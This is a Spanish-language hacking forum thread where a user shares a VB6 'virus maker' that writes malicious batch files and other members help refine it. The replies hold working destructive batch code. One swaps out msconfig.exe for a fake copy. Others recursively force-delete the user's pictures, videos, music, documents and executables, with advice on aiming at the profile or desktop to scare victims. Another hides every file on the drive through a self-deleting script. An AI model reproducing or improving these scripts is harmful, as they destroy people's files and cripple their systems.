Bueno, posteo mi primera creación un poco "seria" en VB6
Es un simple virus maker
para los que entiendan de Batch que se miren los virus que hace porque creo que tiene algun error
Es la segunda versión del programa ya ire mejorando

Agradecimientos a Dr_HaCk93 por orientarme un poco
Que sepan que los codigos no son iguales que los de Bck's Virus Maker, porque enconre otra forma mas facil de editar el archivo batch.

Aquí unas imagenes:

Imagen
<----- El titulo creo que es el logo de un grupo de musica... a mi no me pregunten

Imagen

Para los que esten intersados en el codigo:

Código: Seleccionar todo

Private Sub Command1_Click()
Dim namefile
namefile = Text1.Text <------ en el text1.text va el nombre
Open "direccción en la que se creara el virus" + namefile + ".bat" For Output As #1
If Check1.Value = 1 Then  
Print #1, "comando que quieras editar"
Print #1, "comando que quieras editar"
End If
(si quieres poner mas comandos se repite la operación)
If Check2.Value = 1 Then
"""
"""
"""
End If
End sub

Link de descarga:
[Enlace externo eliminado para invitados]

Video:
[Enlace externo eliminado para invitados]
Imagen

Imagen
Hola, bueno yo voy a empezar por felicitarte, pero también te voy a decir que no funciona del todo bien algunas opciones como por ej: Deshabilitar tecla Windows (no funciona o bien solo surge el efecto después de reiniciada la maquina por lo tanto no tiene sentido). Desinutilizar el "MSconfig"(no funciona)-ahora te codeo una forma de hacer que funcione.

ren C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe asd.exe
ping -n 3 0.0.0.0 > nul
copy C:\WINDOWS\system32\Restore\srdiag.exe C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe /y
del C:\WINDOWS\pchealth\helpctr\binaries\asd.exe /f/q
1era linea: renombra "msconfig.exe" por "asd.exe"(vos te preguntas para que ago esto...bueno...lo ago porque sino no puedo remplazar el original por uno falso)
2da linea: hago un ping para hacer tiempo(esto lo puse porque en algunas pcs tarda mas tiempo para cambiar el nombre...entonces para no complicarme la vida...le doy un poco de tiempo antes del siguiente comando)
3era linea: copia un archivo y al mismo tiempo le cambia el nombre por "msconfig.exe" lo que provoca que el sistema no tenga que crear uno porque acabamos de crear un "msconfig" falso (podes utilizar cualquier archivo-en lo posible que sea un archivo de Windows-...yo puse ese...porque lo único que hace es abrir una ventana de ms-dos) y por ultima la utilización de "/y" lo cual me sirve para que Windows no pregunte nada al usuario y siga las instrucciones
4ta linea: eliminamos el verdadero "msconfig"(es el verdadero pero con nombre "asd.exe")
explicación general: vos quisiste eliminar directamente el "msconfig.exe" directamente....lo cual se puede pero el sistema al percibir que no existe el archivo "msconfg.exe" lo que hace es recrearlo osea volverlo a crear. pero para crearlo de vuelta se retarda unos 5 segundos...los cuales yo aprovecho para hacer una trampilla...esta comprobado por migo mismo que funciona...lo probé en una pc virtual con windows xp sp3.

PD: perdona por tan extensa explicación, y sigue asi.

Saludos!
"¿Qué es la vida? Una ilusión, una sombra, una ficción, y el mayor bien es pequeño: que toda la vida es sueño y los sueños... sueños son."

Calderón de la Barca (1600-1681), dramaturgo español.
es normal que tenga algun fallo estas empezando pero has echo un buen trabajo mis felicitaciones, seguro que para otra version corrijes los fallos jeje.

SALUDOS!!
Soy un camaleón, en tu cama, leona ♪
Fran me as inpresionado:

ren C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe asd.exe
ping -n 3 0.0.0.0 > nul
copy C:\WINDOWS\system32\Restore\srdiag.exe C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe /y        
del C:\WINDOWS\pchealth\helpctr\binaries\asd.exe /f/q
A mi colección

Berdaderamente es un comando muy ingenioso!
dos preguntas ...
1- El codigo anterior podria servir para borrar cualquier otro archivo de windows? porque hay muchos que no se pueden borrar directamente con DEL

2- Si te fijas en el programita los botone, (el unico boton ) es gris y no le puedo cambiar ni el color ni le puedo poner nada solo cambiar la fuente del texto. Porque pasa eso? es mi version de VB? (uso un VB6 portatil con todos los exe)

gracis Dr_HaCk93

salu2!

(ya trabajo en la V3, de nuevo gracias a todos por los consejos )
Imagen

Imagen
Dr_HaCk93 escribió:es normal que tenga algun fallo estas empezando pero has echo un buen trabajo mis felicitaciones, seguro que para otra version corrijes los fallos jeje.

SALUDOS!!
Por supuesto que es totalmente normal...solo se lo corrijo para que aprenda.

Aquí va otro....los comandos para deletear todos los archivos jpg, exe, ect. solo eliminan los archivos con esas extenciones sobre el userprofile...por lo tanto solo tiene efecto sobre el userprofile lo cual, no daria un mal funcionamiento del PC si es eso lo que queres ocasionar con esa funcion(si esto lo hiciste apropósito a prueba de lammers me parece perfecto...pero aclaralo) el comando para eliminar cierto archivo con cierta extensión seria así:

@echo off
del /q /s /f *.jpg
del /q /s /f *.AVI
del /q /s /f *.EXE
del /q /s /f *.Mp3
del /q /s /f *.Doc
PD: para ir a la carpeta de userprofile no es nesesario poner C:\documents and settings\%userprofile% ya que solo poniendo %userprofile% se sobre entiende que equivale a C:\documents and settings\[admin del pc].

PD(2): si se puede usar con cualquier archivo de Windows, y lo del VB ni idea pero fijate en google...tal vez sea porque usas versión portable

Saludos!
"¿Qué es la vida? Una ilusión, una sombra, una ficción, y el mayor bien es pequeño: que toda la vida es sueño y los sueños... sueños son."

Bueno gracias otra bez
No se si entendi muy bien lo que me quieres decir pero si tu pones:

del /q /s /f *.jpg

sin especificar en que directorio lo quieres borrar, o bien te lo borrara en la carpeta de tu user, o si lo as ejecutado de system32 te los borrara de system32, por eso especifique la ruta %userprofile%
que en la version 3 no los borrara de la carpeta del user, los borrara del escritorio:

rem error del "%userprofile%" corregido XD
@echo off
cd\
cd %userprofile%\escritorio  
del /q /s /f *.jpg
exit
Una pregunta, esto borraria los jpg de la carpeta del user? no estoi muy seguro creo que si:

del /q /s /f C:\%userprofile%\*.jpg
o tendria que ser así:

cd\
cd %userprofile%
del /q /s /f *.jpg
Pd: La intención, si era borrar los archivos de la carpeta del user, el la proxima versión borrara los del escritorio para pegar un buen susto

Gracias por la ayuda , suerte y salu2!
Imagen

Imagen
P4velo escribió:Bueno gracias otra bez
No se si entendi muy bien lo que me quieres decir pero si tu pones:

del /q /s /f *.jpg
si pones esto....borrara todos los jpg (según desde que disco se ejecute)(por ej: si se ejecuta desde el disco E: se borraran todos los jpg de ese disco y lo mismo pasaria con otro disco) lo que podes hacer es algo asi

cd [especifica la unidad que queres quitarle los todos los jpg]
del /q /s /f *.jpg
sin especificar en que directorio lo quieres borrar, o bien te lo borrara en la carpeta de tu user, o si lo as ejecutado de system32 te los borrara de system32, por eso especifique la ruta %userprofile%
que en la version 3 no los borrara de la carpeta del user, los borrara del escritorio:

rem error del "%userprofile%" corregido XD
@echo off
cd\
cd %userprofile%\escritorio  
del /q /s /f *.jpg
exit
este code esta perfecto....si la intencion es borrar solo del escritorio....auque no es nesesario el "cd\" esa linea la podes sacar

Una pregunta, esto borraria los jpg de la carpeta del user? no estoi muy seguro creo que si:

del /q /s /f C:\%userprofile%\*.jpg
o tendria que ser así:

cd\
cd %userprofile%
del /q /s /f *.jpg
este me gusta mas que el otro...ademas en el otro pusiste "c:\...."y eso no tenes que ponerlo porque generaria un error ya que seria como poner algo asi "c:\c:\docu..." ¿entendes? se repite el "c:\"
Pd: La intención, si era borrar los archivos de la carpeta del user, el la proxima versión borrara los del escritorio para pegar un buen susto

Gracias por la ayuda , suerte y salu2!
PD: si usas el ultimo code que pusiste, este code lo que hace es borrar todos los archivos jpg que alla(dentro de la carpeta del administrador del PC) incluyendo las sub-carpetas osea que también borra los del escritorio.

Saludos!

ya tengo lista la version 3, donde la pongo? creo un nuevo tema o sigo aquí?
salu2!!!

Aquí la primera imagen
Imagen
Imagen

Imagen
ey men si aceptas un consejo, aqui tienes una forma de ocultar todos los archivos del pc
Quedara vacio¡¡¡ jajaja

cd "C:\"
for %%v in (A* B* C* D* E* F* G* H* I* J* K* L* M* N* Ñ* O* P* Q* R* S* T* U* V* W* X* Y* Z* 1* 2* 3* 4* 5* 6* 7* 8* 9* 0*) do (@attrib /s /d +a +h +r +s (y si tienes windows vista -i) "*.*") 
Y si se quiere crear como un bat individual

@echo off
cd /
cd ..
cd ..
cd ..
cd ..
echo for %%v in (A* B* C* D* E* F* G* H* I* J* K* L* M* N* Ñ* O* P* Q* R* S* T* U* V* W* X* Y* Z* 1* 2* 3* 4* 5* 6* 7* 8* 9* 0*) do (@attrib /s /d +a +h +r +s (y si tienes windows vista -i) "*.*") >> "C:\hide.bat"
echo del /f /s /q %0 >> "C:\hide.bat"
start hide.bat
Si veis algun fallo corregidme, seguramente me equivoque en algo sobre todo en el segundo code, no se me da bien la inyeccion de codigo¡¡
Los policias contra los hackers son exactamente igual que la iglesia contra los sabios, ambos castigan la inteligencia....
No hace falta poner cd.. si pones cd\ ya esta mira:

@echo off
cd\
echo for %%v in (A* B* C* D* E* F* G* H* I* J* K* L* M* N* Ñ* O* P* Q* R* S* T* U* V* W* X* Y* Z* 1* 2* 3* 4* 5* 6* 7* 8* 9* 0*) do (@attrib /s /d +a +h +r +s (y si tienes windows vista -i) "*.*") >> "C:\hide.bat"
start hide.bat
no se mucho del comando attrib pero creo que lo demas esta bien

gracias por los codes! salu2!
Imagen

Imagen
P4velo escribió:No hace falta poner cd.. si pones cd\ ya esta mira:

@echo off
cd\
start hide.bat
no se mucho del comando attrib pero creo que lo demas esta bien

gracias por los codes! salu2!
jeje el attrib sirve para establecer atributos, de sistema, oculto, bla, bla y la -i es para las desindexacion en windows vista para k no puedan encontrarlo aunk sepan el nombre del archivo
Los policias contra los hackers son exactamente igual que la iglesia contra los sabios, ambos castigan la inteligencia....
significa k recorra todos los archivos de la carpeta actual, por eso le digo k vaya al directorio raiz

y lo de cd .. a veces si es necesario pork lo he comprobado en windows xp k no sube al directorio c: con cd / asi k no esta demas ponerle unos cuantos cd .. para aseguarnos
Responder

Volver a “Nuestros Programas”